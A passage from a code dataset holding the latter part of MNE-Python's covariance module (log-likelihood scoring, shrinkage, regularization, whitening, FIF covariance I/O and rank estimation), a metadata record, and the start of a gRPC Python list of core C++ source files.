return out
def _logdet(A):
"""Compute the log det of a symmetric matrix."""
vals = linalg.eigh(A)[0]
vals = np.abs(vals) # avoid negative values (numerical errors)
return np.sum(np.log(vals))
def _gaussian_loglik_scorer(est, X, y=None):
"""Compute the Gaussian log likelihood of X under the model in est."""
# compute empirical covariance of the test set
precision = est.get_precision()
n_samples, n_features = X.shape
log_like = np.zeros(n_samples)
log_like = -.5 * (X * (np.dot(X, precision))).sum(axis=1)
log_like -= .5 * (n_features * log(2. * np.pi) - _logdet(precision))
out = np.mean(log_like)
return out
def _cross_val(data, est, cv, n_jobs):
"""Helper to compute cross validation."""
from sklearn.cross_validation import cross_val_score
return np.mean(cross_val_score(est, data, cv=cv, n_jobs=n_jobs,
scoring=_gaussian_loglik_scorer))
def _auto_low_rank_model(data, mode, n_jobs, method_params, cv,
stop_early=True, verbose=None):
"""compute latent variable models."""
method_params = cp.deepcopy(method_params)
iter_n_components = method_params.pop('iter_n_components')
if iter_n_components is None:
iter_n_components = np.arange(5, data.shape[1], 5)
from sklearn.decomposition import PCA, FactorAnalysis
if mode == 'factor_analysis':
est = FactorAnalysis
elif mode == 'pca':
est = PCA
else:
raise ValueError('Come on, this is not a low rank estimator: %s' %
mode)
est = est(**method_params)
est.n_components = 1
scores = np.empty_like(iter_n_components, dtype=np.float64)
scores.fill(np.nan)
# make sure we don't empty the thing if it's a generator
max_n = max(list(cp.deepcopy(iter_n_components)))
if max_n > data.shape[1]:
warnings.warn('You are trying to estimate %i components on matrix '
'with %i features.' % (max_n, data.shape[1]))
for ii, n in enumerate(iter_n_components):
est.n_components = n
try: # this may fail depending on rank and split
score = _cross_val(data=data, est=est, cv=cv, n_jobs=n_jobs)
except ValueError:
score = np.inf
if np.isinf(score) or score > 0:
logger.info('... infinite values encountered. stopping estimation')
break
logger.info('... rank: %i - loglik: %0.3f' % (n, score))
if score != -np.inf:
scores[ii] = score
if (ii >= 3 and np.all(np.diff(scores[ii - 3:ii]) < 0.) and
stop_early is True):
# early stop search when loglik has been going down 3 times
logger.info('early stopping parameter search.')
break
# happens if rank is too low right form the beginning
if np.isnan(scores).all():
raise RuntimeError('Oh no! Could not estimate covariance because all '
'scores were NaN. Please contact the MNE-Python '
'developers.')
i_score = np.nanargmax(scores)
best = est.n_components = iter_n_components[i_score]
logger.info('... best model at rank = %i' % best)
runtime_info = {'ranks': np.array(iter_n_components),
'scores': scores,
'best': best,
'cv': cv}
return est, runtime_info
def _get_covariance_classes():
"""Prepare special cov estimators."""
from sklearn.covariance import (EmpiricalCovariance, shrunk_covariance,
ShrunkCovariance)
class _RegCovariance(EmpiricalCovariance):
"""Aux class."""
def __init__(self, info, grad=0.01, mag=0.01, eeg=0.0,
store_precision=False, assume_centered=False):
self.info = info
self.grad = grad
self.mag = mag
self.eeg = eeg
self.store_precision = store_precision
self.assume_centered = assume_centered
def fit(self, X):
EmpiricalCovariance.fit(self, X)
self.covariance_ = 0.5 * (self.covariance_ + self.covariance_.T)
cov_ = Covariance(None)
cov_['data'] = self.covariance_
cov_['names'] = self.info['ch_names']
cov_['nfree'] = len(self.covariance_)
cov_['bads'] = self.info['bads']
cov_['projs'] = self.info['projs']
cov_['diag'] = False
cov_ = regularize(cov_, self.info, grad=self.grad, mag=self.mag,
eeg=self.eeg, proj=False,
exclude='bads') # ~proj == important!!
self.covariance_ = cov_.data
return self
class _ShrunkCovariance(ShrunkCovariance):
"""Aux class."""
def __init__(self, store_precision, assume_centered, shrinkage=0.1):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.shrinkage = shrinkage
def fit(self, X):
EmpiricalCovariance.fit(self, X)
cov = self.covariance_
if not isinstance(self.shrinkage, (list, tuple)):
shrinkage = [('all', self.shrinkage, np.arange(len(cov)))]
else:
shrinkage = self.shrinkage
zero_cross_cov = np.zeros_like(cov, dtype=bool)
for a, b in itt.combinations(shrinkage, 2):
picks_i, picks_j = a[2], b[2]
ch_ = a[0], b[0]
if 'eeg' in ch_:
zero_cross_cov[np.ix_(picks_i, picks_j)] = True
zero_cross_cov[np.ix_(picks_j, picks_i)] = True
self.zero_cross_cov_ = zero_cross_cov
# Apply shrinkage to blocks
for ch_type, c, picks in shrinkage:
sub_cov = cov[np.ix_(picks, picks)]
cov[np.ix_(picks, picks)] = shrunk_covariance(sub_cov,
shrinkage=c)
# Apply shrinkage to cross-cov
for a, b in itt.combinations(shrinkage, 2):
shrinkage_i, shrinkage_j = a[1], b[1]
picks_i, picks_j = a[2], b[2]
c_ij = np.sqrt((1. - shrinkage_i) * (1. - shrinkage_j))
cov[np.ix_(picks_i, picks_j)] *= c_ij
cov[np.ix_(picks_j, picks_i)] *= c_ij
# Set to zero the necessary cross-cov
if np.any(zero_cross_cov):
cov[zero_cross_cov] = 0.0
self.covariance_ = cov
return self
def score(self, X_test, y=None):
"""Compute the log-likelihood of a Gaussian data set with
`self.covariance_` as an estimator of its covariance matrix.
Parameters
----------
X_test : array-like, shape = [n_samples, n_features]
Test data of which we compute the likelihood, where n_samples
is the number of samples and n_features is the number of
features. X_test is assumed to be drawn from the same
distribution as the data used in fit (including centering).
y : not used, present for API consistence purpose.
Returns
-------
res : float
The likelihood of the data set with `self.covariance_` as an
estimator of its covariance matrix.
"""
from sklearn.covariance import empirical_covariance, log_likelihood
# compute empirical covariance of the test set
test_cov = empirical_covariance(X_test - self.location_,
assume_centered=True)
if np.any(self.zero_cross_cov_):
test_cov[self.zero_cross_cov_] = 0.
res = log_likelihood(test_cov, self.get_precision())
return res
return _RegCovariance, _ShrunkCovariance
###############################################################################
# Writing
def write_cov(fname, cov):
"""Write a noise covariance matrix.
Parameters
----------
fname : string
The name of the file. It should end with -cov.fif or -cov.fif.gz.
cov : Covariance
The noise covariance matrix
See Also
--------
read_cov
"""
cov.save(fname)
###############################################################################
# Prepare for inverse modeling
def _unpack_epochs(epochs):
"""Aux Function."""
if len(epochs.event_id) > 1:
epochs = [epochs[k] for k in epochs.event_id]
else:
epochs = [epochs]
return epochs
def _get_ch_whitener(A, pca, ch_type, rank):
""""Get whitener params for a set of channels."""
# whitening operator
eig, eigvec = linalg.eigh(A, overwrite_a=True)
eigvec = eigvec.T
eig[:-rank] = 0.0
logger.info('Setting small %s eigenvalues to zero.' % ch_type)
if not pca: # No PCA case.
logger.info('Not doing PCA for %s.' % ch_type)
else:
logger.info('Doing PCA for %s.' % ch_type)
# This line will reduce the actual number of variables in data
# and leadfield to the true rank.
eigvec = eigvec[:-rank].copy()
return eig, eigvec
@verbose
def prepare_noise_cov(noise_cov, info, ch_names, rank=None,
scalings=None, verbose=None):
"""Prepare noise covariance matrix.
Parameters
----------
noise_cov : Covariance
The noise covariance to process.
info : dict
The measurement info (used to get channel types and bad channels).
ch_names : list
The channel names to be considered.
rank : None | int | dict
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None
Data will be rescaled before rank estimation to improve accuracy.
If dict, it will override the following dict (default if None):
dict(mag=1e12, grad=1e11, eeg=1e5)
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
"""
C_ch_idx = [noise_cov.ch_names.index(c) for c in ch_names]
if noise_cov['diag'] is False:
C = noise_cov.data[np.ix_(C_ch_idx, C_ch_idx)]
else:
C = np.diag(noise_cov.data[C_ch_idx])
scalings = _handle_default('scalings_cov_rank', scalings)
# Create the projection operator
proj, ncomp, _ = make_projector(info['projs'], ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension = %d)'
% ncomp)
C = np.dot(proj, np.dot(C, proj.T))
pick_meg = pick_types(info, meg=True, eeg=False, ref_meg=False,
exclude='bads')
pick_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude='bads')
meg_names = [info['chs'][k]['ch_name'] for k in pick_meg]
C_meg_idx = [k for k in range(len(C)) if ch_names[k] in meg_names]
eeg_names = [info['chs'][k]['ch_name'] for k in pick_eeg]
C_eeg_idx = [k for k in range(len(C)) if ch_names[k] in eeg_names]
has_meg = len(C_meg_idx) > 0
has_eeg = len(C_eeg_idx) > 0
# Get the specified noise covariance rank
if rank is not None:
if isinstance(rank, dict):
rank_meg = rank.get('meg', None)
rank_eeg = rank.get('eeg', None)
else:
rank_meg = int(rank)
rank_eeg = None
else:
rank_meg, rank_eeg = None, None
if has_meg:
C_meg = C[np.ix_(C_meg_idx, C_meg_idx)]
this_info = pick_info(info, pick_meg)
if rank_meg is None:
if len(C_meg_idx) < len(pick_meg):
this_info = pick_info(info, C_meg_idx)
rank_meg = _estimate_rank_meeg_cov(C_meg, this_info, scalings)
C_meg_eig, C_meg_eigvec = _get_ch_whitener(C_meg, False, 'MEG',
rank_meg)
if has_eeg:
C_eeg = C[np.ix_(C_eeg_idx, C_eeg_idx)]
this_info = pick_info(info, pick_eeg)
if rank_eeg is None:
if len(C_meg_idx) < len(pick_meg):
this_info = pick_info(info, C_eeg_idx)
rank_eeg = _estimate_rank_meeg_cov(C_eeg, this_info, scalings)
C_eeg_eig, C_eeg_eigvec = _get_ch_whitener(C_eeg, False, 'EEG',
rank_eeg)
if not _has_eeg_average_ref_proj(info['projs']):
warnings.warn('No average EEG reference present in info["projs"], '
'covariance may be adversely affected. Consider '
'recomputing covariance using a raw file with an '
'average eeg reference projector added.')
n_chan = len(ch_names)
eigvec = np.zeros((n_chan, n_chan), dtype=np.float)
eig = np.zeros(n_chan, dtype=np.float)
if has_meg:
eigvec[np.ix_(C_meg_idx, C_meg_idx)] = C_meg_eigvec
eig[C_meg_idx] = C_meg_eig
if has_eeg:
eigvec[np.ix_(C_eeg_idx, C_eeg_idx)] = C_eeg_eigvec
eig[C_eeg_idx] = C_eeg_eig
assert(len(C_meg_idx) + len(C_eeg_idx) == n_chan)
noise_cov = cp.deepcopy(noise_cov)
noise_cov.update(data=C, eig=eig, eigvec=eigvec, dim=len(ch_names),
diag=False, names=ch_names)
return noise_cov
def regularize(cov, info, mag=0.1, grad=0.1, eeg=0.1, exclude='bads',
proj=True, verbose=None):
"""Regularize noise covariance matrix.
This method works by adding a constant to the diagonal for each
channel type separately. Special care is taken to keep the
rank of the data constant.
**Note:** This function is kept for reasons of backward-compatibility.
Please consider explicitly using the ``method`` parameter in
`compute_covariance` to directly combine estimation with regularization
in a data-driven fashion see the
`faq <http://martinos.org/mne/dev/faq.html#how-should-i-regularize-the-covariance-matrix>`_
for more information.
Parameters
----------
cov : Covariance
The noise covariance matrix.
info : dict
The measurement info (used to get channel types and bad channels).
mag : float (default 0.1)
Regularization factor for MEG magnetometers.
grad : float (default 0.1)
Regularization factor for MEG gradiometers.
eeg : float (default 0.1)
Regularization factor for EEG.
exclude : list | 'bads' (default 'bads')
List of channels to mark as bad. If 'bads', bads channels
are extracted from both info['bads'] and cov['bads'].
proj : bool (default true)
Apply or not projections to keep rank of data.
verbose : bool | str | int | None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
reg_cov : Covariance
The regularized covariance matrix.
See Also
--------
compute_covariance
""" # noqa
cov = cp.deepcopy(cov)
info._check_consistency()
if exclude is None:
raise ValueError('exclude must be a list of strings or "bads"')
if exclude == 'bads':
exclude = info['bads'] + cov['bads']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=exclude)
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=exclude)
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=exclude)
info_ch_names = info['ch_names']
ch_names_eeg = [info_ch_names[i] for i in sel_eeg]
ch_names_mag = [info_ch_names[i] for i in sel_mag]
ch_names_grad = [info_ch_names[i] for i in sel_grad]
# This actually removes bad channels from the cov, which is not backward
# compatible, so let's leave all channels in
cov_good = pick_channels_cov(cov, include=info_ch_names, exclude=exclude)
ch_names = cov_good.ch_names
idx_eeg, idx_mag, idx_grad = [], [], []
for i, ch in enumerate(ch_names):
if ch in ch_names_eeg:
idx_eeg.append(i)
elif ch in ch_names_mag:
idx_mag.append(i)
elif ch in ch_names_grad:
idx_grad.append(i)
else:
raise Exception('channel is unknown type')
C = cov_good['data']
assert len(C) == (len(idx_eeg) + len(idx_mag) + len(idx_grad))
if proj:
projs = info['projs'] + cov_good['projs']
projs = activate_proj(projs)
for desc, idx, reg in [('EEG', idx_eeg, eeg), ('MAG', idx_mag, mag),
('GRAD', idx_grad, grad)]:
if len(idx) == 0 or reg == 0.0:
logger.info(" %s regularization : None" % desc)
continue
logger.info(" %s regularization : %s" % (desc, reg))
this_C = C[np.ix_(idx, idx)]
if proj:
this_ch_names = [ch_names[k] for k in idx]
P, ncomp, _ = make_projector(projs, this_ch_names)
U = linalg.svd(P)[0][:, :-ncomp]
if ncomp > 0:
logger.info(' Created an SSP operator for %s '
'(dimension = %d)' % (desc, ncomp))
this_C = np.dot(U.T, np.dot(this_C, U))
sigma = np.mean(np.diag(this_C))
this_C.flat[::len(this_C) + 1] += reg * sigma # modify diag inplace
if proj and ncomp > 0:
this_C = np.dot(U, np.dot(this_C, U.T))
C[np.ix_(idx, idx)] = this_C
# Put data back in correct locations
idx = pick_channels(cov.ch_names, info_ch_names, exclude=exclude)
cov['data'][np.ix_(idx, idx)] = C
return cov
def _regularized_covariance(data, reg=None):
"""Compute a regularized covariance from data using sklearn.
Parameters
----------
data : ndarray, shape (n_channels, n_times)
Data for covariance estimation.
reg : float | str | None (default None)
If not None, allow regularization for covariance estimation
if float, shrinkage covariance is used (0 <= shrinkage <= 1).
if str, optimal shrinkage using Ledoit-Wolf Shrinkage ('ledoit_wolf')
or Oracle Approximating Shrinkage ('oas').
Returns
-------
cov : ndarray, shape (n_channels, n_channels)
The covariance matrix.
"""
if reg is None:
# compute empirical covariance
cov = np.cov(data)
else:
no_sklearn_err = ('the scikit-learn package is missing and '
'required for covariance regularization.')
# use sklearn covariance estimators
if isinstance(reg, float):
if (reg < 0) or (reg > 1):
raise ValueError('0 <= shrinkage <= 1 for '
'covariance regularization.')
try:
import sklearn
sklearn_version = LooseVersion(sklearn.__version__)
from sklearn.covariance import ShrunkCovariance
except ImportError:
raise Exception(no_sklearn_err)
if sklearn_version < '0.12':
skl_cov = ShrunkCovariance(shrinkage=reg,
store_precision=False)
else:
# init sklearn.covariance.ShrunkCovariance estimator
skl_cov = ShrunkCovariance(shrinkage=reg,
store_precision=False,
assume_centered=True)
elif isinstance(reg, six.string_types):
if reg == 'ledoit_wolf':
try:
from sklearn.covariance import LedoitWolf
except ImportError:
raise Exception(no_sklearn_err)
# init sklearn.covariance.LedoitWolf estimator
skl_cov = LedoitWolf(store_precision=False,
assume_centered=True)
elif reg == 'oas':
try:
from sklearn.covariance import OAS
except ImportError:
raise Exception(no_sklearn_err)
# init sklearn.covariance.OAS estimator
skl_cov = OAS(store_precision=False,
assume_centered=True)
else:
raise ValueError("regularization parameter should be "
"'lwf' or 'oas'")
else:
raise ValueError("regularization parameter should be "
"of type str or int (got %s)." % type(reg))
# compute regularized covariance using sklearn
cov = skl_cov.fit(data.T).covariance_
return cov
def compute_whitener(noise_cov, info, picks=None, rank=None,
scalings=None, verbose=None):
"""Compute whitening matrix.
Parameters
----------
noise_cov : Covariance
The noise covariance.
info : dict
The measurement info.
picks : array-like of int | None
The channels indices to include. If None the data
channels in info, except bad channels, are used.
rank : None | int | dict
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None
The rescaling method to be applied. See documentation of
``prepare_noise_cov`` for details.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
W : 2d array
The whitening matrix.
ch_names : list
The channel names.
"""
if picks is None:
picks = pick_types(info, meg=True, eeg=True, ref_meg=False,
exclude='bads')
ch_names = [info['chs'][k]['ch_name'] for k in picks]
noise_cov = cp.deepcopy(noise_cov)
noise_cov = prepare_noise_cov(noise_cov, info, ch_names,
rank=rank, scalings=scalings)
n_chan = len(ch_names)
W = np.zeros((n_chan, n_chan), dtype=np.float)
#
# Omit the zeroes due to projection
#
eig = noise_cov['eig']
nzero = (eig > 0)
W[nzero, nzero] = 1.0 / np.sqrt(eig[nzero])
#
# Rows of eigvec are the eigenvectors
#
W = np.dot(W, noise_cov['eigvec'])
W = np.dot(noise_cov['eigvec'].T, W)
return W, ch_names
@verbose
def whiten_evoked(evoked, noise_cov, picks=None, diag=False, rank=None,
scalings=None, verbose=None):
"""Whiten evoked data using given noise covariance.
Parameters
----------
evoked : instance of Evoked
The evoked data
noise_cov : instance of Covariance
The noise covariance
picks : array-like of int | None
The channel indices to whiten. Can be None to whiten MEG and EEG
data.
diag : bool (default False)
If True, whiten using only the diagonal of the covariance.
rank : None | int | dict (default None)
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None (default None)
To achieve reliable rank estimation on multiple sensors,
sensors have to be rescaled. This parameter controls the
rescaling. If dict, it will override the
following default dict (default if None):
dict(mag=1e12, grad=1e11, eeg=1e5)
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
evoked_white : instance of Evoked
The whitened evoked data.
"""
evoked = cp.deepcopy(evoked)
if picks is None:
picks = pick_types(evoked.info, meg=True, eeg=True)
W = _get_whitener_data(evoked.info, noise_cov, picks,
diag, rank, scalings, evoked.nave)
evoked.data[picks] = np.sqrt(evoked.nave) * np.dot(W, evoked.data[picks])
return evoked
@verbose
def _get_whitener_data(info, noise_cov, picks, diag=False, rank=None,
scalings=None, verbose=None):
"""Get whitening matrix for a set of data."""
ch_names = [info['ch_names'][k] for k in picks]
noise_cov = pick_channels_cov(noise_cov, include=ch_names, exclude=[])
info = pick_info(info, picks)
if diag:
noise_cov = cp.deepcopy(noise_cov)
noise_cov['data'] = np.diag(np.diag(noise_cov['data']))
scalings = _handle_default('scalings_cov_rank', scalings)
W = compute_whitener(noise_cov, info, rank=rank, scalings=scalings)[0]
return W
@verbose
def _read_cov(fid, node, cov_kind, verbose=None):
"""Read a noise covariance matrix."""
# Find all covariance matrices
covs = dir_tree_find(node, FIFF.FIFFB_MNE_COV)
if len(covs) == 0:
raise ValueError('No covariance matrices found')
# Is any of the covariance matrices a noise covariance
for p in range(len(covs)):
tag = find_tag(fid, covs[p], FIFF.FIFF_MNE_COV_KIND)
if tag is not None and int(tag.data) == cov_kind:
this = covs[p]
# Find all the necessary data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_DIM)
if tag is None:
raise ValueError('Covariance matrix dimension not found')
dim = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_NFREE)
if tag is None:
nfree = -1
else:
nfree = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_METHOD)
if tag is None:
method = None
else:
method = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_SCORE)
if tag is None:
score = None
else:
score = tag.data[0]
tag = find_tag(fid, this, FIFF.FIFF_MNE_ROW_NAMES)
if tag is None:
names = []
else:
names = tag.data.split(':')
if len(names) != dim:
raise ValueError('Number of names does not match '
'covariance matrix dimension')
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_DIAG)
if tag is None:
raise ValueError('No covariance matrix data found')
else:
# Diagonal is stored
data = tag.data
diagmat = True
logger.info(' %d x %d diagonal covariance (kind = '
'%d) found.' % (dim, dim, cov_kind))
else:
from scipy import sparse
if not sparse.issparse(tag.data):
# Lower diagonal is stored
vals = tag.data
data = np.zeros((dim, dim))
data[np.tril(np.ones((dim, dim))) > 0] = vals
data = data + data.T
data.flat[::dim + 1] /= 2.0
diagmat = False
logger.info(' %d x %d full covariance (kind = %d) '
'found.' % (dim, dim, cov_kind))
else:
diagmat = False
data = tag.data
logger.info(' %d x %d sparse covariance (kind = %d)'
' found.' % (dim, dim, cov_kind))
# Read the possibly precomputed decomposition
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_COV_EIGENVALUES)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_COV_EIGENVECTORS)
if tag1 is not None and tag2 is not None:
eig = tag1.data
eigvec = tag2.data
else:
eig = None
eigvec = None
# Read the projection operator
projs = _read_proj(fid, this)
# Read the bad channel list
bads = read_bad_channels(fid, this)
# Put it together
cov = dict(kind=cov_kind, diag=diagmat, dim=dim, names=names,
data=data, projs=projs, bads=bads, nfree=nfree, eig=eig,
eigvec=eigvec)
if score is not None:
cov['loglik'] = score
if method is not None:
cov['method'] = method
return cov
logger.info(' Did not find the desired covariance matrix (kind = %d)'
% cov_kind)
return None
def _write_cov(fid, cov):
"""Write a noise covariance matrix."""
start_block(fid, FIFF.FIFFB_MNE_COV)
# Dimensions etc.
write_int(fid, FIFF.FIFF_MNE_COV_KIND, cov['kind'])
write_int(fid, FIFF.FIFF_MNE_COV_DIM, cov['dim'])
if cov['nfree'] > 0:
write_int(fid, FIFF.FIFF_MNE_COV_NFREE, cov['nfree'])
# Channel names
if cov['names'] is not None and len(cov['names']) > 0:
write_name_list(fid, FIFF.FIFF_MNE_ROW_NAMES, cov['names'])
# Data
if cov['diag']:
write_double(fid, FIFF.FIFF_MNE_COV_DIAG, cov['data'])
else:
# Store only lower part of covariance matrix
dim = cov['dim']
mask = np.tril(np.ones((dim, dim), dtype=np.bool)) > 0
vals = cov['data'][mask].ravel()
write_double(fid, FIFF.FIFF_MNE_COV, vals)
# Eigenvalues and vectors if present
if cov['eig'] is not None and cov['eigvec'] is not None:
write_float_matrix(fid, FIFF.FIFF_MNE_COV_EIGENVECTORS, cov['eigvec'])
write_double(fid, FIFF.FIFF_MNE_COV_EIGENVALUES, cov['eig'])
# Projection operator
if cov['projs'] is not None and len(cov['projs']) > 0:
_write_proj(fid, cov['projs'])
# Bad channels
if cov['bads'] is not None and len(cov['bads']) > 0:
start_block(fid, FIFF.FIFFB_MNE_BAD_CHANNELS)
write_name_list(fid, FIFF.FIFF_MNE_CH_NAME_LIST, cov['bads'])
end_block(fid, FIFF.FIFFB_MNE_BAD_CHANNELS)
# estimator method
if 'method' in cov:
write_string(fid, FIFF.FIFF_MNE_COV_METHOD, cov['method'])
# negative log-likelihood score
if 'loglik' in cov:
write_double(
fid, FIFF.FIFF_MNE_COV_SCORE, np.array(cov['loglik']))
# Done!
end_block(fid, FIFF.FIFFB_MNE_COV)
def _apply_scaling_array(data, picks_list, scalings):
"""Scale data type-dependently for estimation."""
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
picks_dict = dict(picks_list)
scalings = [(picks_dict[k], v) for k, v in scalings.items()
if k in picks_dict]
for idx, scaling in scalings:
data[idx, :] *= scaling # F - order
else:
data *= scalings[:, np.newaxis] # F - order
def _undo_scaling_array(data, picks_list, scalings):
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
scalings = dict((k, 1. / v) for k, v in scalings.items())
elif isinstance(scalings, np.ndarray):
scalings = 1. / scalings
return _apply_scaling_array(data, picks_list, scalings)
def _apply_scaling_cov(data, picks_list, scalings):
"""Scale resulting data after estimation."""
scalings = _check_scaling_inputs(data, picks_list, scalings)
scales = None
if isinstance(scalings, dict):
n_channels = len(data)
covinds = list(zip(*picks_list))[1]
assert len(data) == sum(len(k) for k in covinds)
assert list(sorted(np.concatenate(covinds))) == list(range(len(data)))
scales = np.zeros(n_channels)
for ch_t, idx in picks_list:
scales[idx] = scalings[ch_t]
elif isinstance(scalings, np.ndarray):
if len(scalings) != len(data):
raise ValueError('Scaling factors and data are of incompatible '
'shape')
scales = scalings
elif scalings is None:
pass
else:
raise RuntimeError('Arff...')
if scales is not None:
assert np.sum(scales == 0.) == 0
data *= (scales[None, :] * scales[:, None])
def _undo_scaling_cov(data, picks_list, scalings):
scalings = _check_scaling_inputs(data, picks_list, scalings)
if isinstance(scalings, dict):
scalings = dict((k, 1. / v) for k, v in scalings.items())
elif isinstance(scalings, np.ndarray):
scalings = 1. / scalings
return _apply_scaling_cov(data, picks_list, scalings)
def _check_scaling_inputs(data, picks_list, scalings):
"""Aux function."""
rescale_dict_ = dict(mag=1e15, grad=1e13, eeg=1e6)
scalings_ = None
if isinstance(scalings, string_types) and scalings == 'norm':
scalings_ = 1. / _compute_row_norms(data)
elif isinstance(scalings, dict):
rescale_dict_.update(scalings)
scalings_ = rescale_dict_
elif isinstance(scalings, np.ndarray):
scalings_ = scalings
elif scalings is None:
pass
else:
raise NotImplementedError("No way! That's not a rescaling "
'option: %s' % scalings)
return scalings_
def _estimate_rank_meeg_signals(data, info, scalings, tol=1e-4,
return_singular=False, copy=True):
"""Estimate rank for M/EEG data.
Parameters
----------
data : np.ndarray of float, shape(n_channels, n_samples)
The M/EEG signals.
info : mne.io.measurement_info.Info
The measurment info.
scalings : dict | 'norm' | np.ndarray | None
The rescaling method to be applied. If dict, it will override the
following default dict:
dict(mag=1e15, grad=1e13, eeg=1e6)
If 'norm' data will be scaled by channel-wise norms. If array,
pre-specified norms will be used. If None, no scaling will be applied.
return_singular : bool
If True, also return the singular values that were used
to determine the rank.
copy : bool
If False, values in data will be modified in-place during
rank estimation (saves memory).
Returns
-------
rank : int
Estimated rank of the data.
s : array
If return_singular is True, the singular values that were
thresholded to determine the rank are also returned.
"""
picks_list = _picks_by_type(info)
_apply_scaling_array(data, picks_list, scalings)
if data.shape[1] < data.shape[0]:
ValueError("You've got fewer samples than channels, your "
"rank estimate might be inaccurate.")
out = estimate_rank(data, tol=tol, norm=False,
return_singular=return_singular, copy=copy)
rank = out[0] if isinstance(out, tuple) else out
ch_type = ' + '.join(list(zip(*picks_list))[0])
logger.info('estimated rank (%s): %d' % (ch_type, rank))
_undo_scaling_array(data, picks_list, scalings)
return out
def _estimate_rank_meeg_cov(data, info, scalings, tol=1e-4,
return_singular=False, copy=True):
"""Estimate rank for M/EEG data.
Parameters
----------
data : np.ndarray of float, shape (n_channels, n_channels)
The M/EEG covariance.
info : mne.io.measurement_info.Info
The measurment info.
scalings : dict | 'norm' | np.ndarray | None
The rescaling method to be applied. If dict, it will override the
following default dict:
dict(mag=1e12, grad=1e11, eeg=1e5)
If 'norm' data will be scaled by channel-wise norms. If array,
pre-specified norms will be used. If None, no scaling will be applied.
return_singular : bool
If True, also return the singular values that were used
to determine the rank.
copy : bool
If False, values in data will be modified in-place during
rank estimation (saves memory).
Returns
-------
rank : int
Estimated rank of the data.
s : array
If return_singular is True, the singular values that were
thresholded to determine the rank are also returned.
"""
picks_list = _picks_by_type(info)
scalings = _handle_default('scalings_cov_rank', scalings)
_apply_scaling_cov(data, picks_list, scalings)
if data.shape[1] < data.shape[0]:
ValueError("You've got fewer samples than channels, your "
"rank estimate might be inaccurate.")
out = estimate_rank(data, tol=tol, norm=False,
return_singular=return_singular, copy=copy)
rank = out[0] if isinstance(out, tuple) else out
ch_type = ' + '.join(list(zip(*picks_list))[0])
logger.info('estimated rank (%s): %d' % (ch_type, rank))
_undo_scaling_cov(data, picks_list, scalings)
return out
|
andyh616/mne-python
|
mne/cov.py
|
Python
|
bsd-3-clause
| 70,741
|
[
"Gaussian"
] |
12f1db2da3b39d57290a3581ab5b46ad6487c386fb179ec6b5f19233c1060573
|
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# AUTO-GENERATED FROM `$REPO_ROOT/templates/src/python/grpcio/grpc_core_dependencies.py.template`!!!
CORE_SOURCE_FILES = [
'src/core/ext/filters/census/grpc_context.cc',
'src/core/ext/filters/client_channel/backend_metric.cc',
'src/core/ext/filters/client_channel/backup_poller.cc',
'src/core/ext/filters/client_channel/channel_connectivity.cc',
'src/core/ext/filters/client_channel/client_channel.cc',
'src/core/ext/filters/client_channel/client_channel_channelz.cc',
'src/core/ext/filters/client_channel/client_channel_factory.cc',
'src/core/ext/filters/client_channel/client_channel_plugin.cc',
'src/core/ext/filters/client_channel/config_selector.cc',
'src/core/ext/filters/client_channel/dynamic_filters.cc',
'src/core/ext/filters/client_channel/global_subchannel_pool.cc',
'src/core/ext/filters/client_channel/health/health_check_client.cc',
'src/core/ext/filters/client_channel/http_connect_handshaker.cc',
'src/core/ext/filters/client_channel/http_proxy.cc',
'src/core/ext/filters/client_channel/lb_policy.cc',
'src/core/ext/filters/client_channel/lb_policy/address_filtering.cc',
'src/core/ext/filters/client_channel/lb_policy/child_policy_handler.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/client_load_reporting_filter.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_balancer_addresses.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_channel_secure.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/grpclb_client_stats.cc',
'src/core/ext/filters/client_channel/lb_policy/grpclb/load_balancer_api.cc',
'src/core/ext/filters/client_channel/lb_policy/pick_first/pick_first.cc',
'src/core/ext/filters/client_channel/lb_policy/priority/priority.cc',
'src/core/ext/filters/client_channel/lb_policy/ring_hash/ring_hash.cc',
'src/core/ext/filters/client_channel/lb_policy/rls/rls.cc',
'src/core/ext/filters/client_channel/lb_policy/round_robin/round_robin.cc',
